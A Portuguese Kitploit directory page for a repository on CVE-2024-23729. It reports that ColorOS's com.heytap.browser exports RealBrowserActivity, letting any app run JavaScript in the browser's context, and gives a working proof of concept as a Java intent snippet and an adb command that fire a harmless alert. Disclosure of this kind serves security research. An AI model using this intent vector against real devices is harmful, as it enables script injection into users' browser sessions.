Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
com.heytap.browser — CVE-2024-23729 | Kitploit
Ferramentas/GitHubGitHub/actuator/com.heytap.browser
Segurança AndroidAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Móvel
GitHubactuator/com.heytap.browser

com.heytap.browser

CVE-2024-23729

Ver Repositório
87há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Relatório de Vulnerabilidade

Visão Geral:

Uma vulnerabilidade foi descoberta no aplicativo com.heytap.browser na plataforma Android. A vulnerabilidade permite que um atacante execute código JavaScript arbitrário no contexto do aplicativo sem necessitar de permissões.

Detalhes da Aplicação:

  • Fornecedor: - ColorOS
  • Nome da Aplicação: 'Internet Browser' com.heytap.browser
  • Versão: 45.10.3.4.1
  • Componente: com.android.browser.RealBrowserActivity

Detalhes da Vulnerabilidade:

  • Tipo de Vulnerabilidade: Execução de Código JavaScript
  • Vetor de Ataque: Através de um componente de atividade exportado
  • Permissões Necessárias: Nenhuma

Descrição:

A atividade com.android.browser.RealBrowserActivity no aplicativo com.heytap.browser é exportada e pode ser invocada por qualquer aplicativo de terceiros sem exigir permissões. Um aplicativo malicioso pode explorar isso para executar código JavaScript arbitrário no contexto do aplicativo `com.heytap.browser``.

Prova de Conceito (PoC):

root@kitploit:~
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
root@kitploit:~

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

com heytap browser- 45 10 3 4 1-JS poc-coloros

Impacto:

A exploração bem-sucedida permite que um invasor:

  • Execute código JavaScript arbitrário no contexto do aplicativo com.heytap.browser.
Baixar ferramenta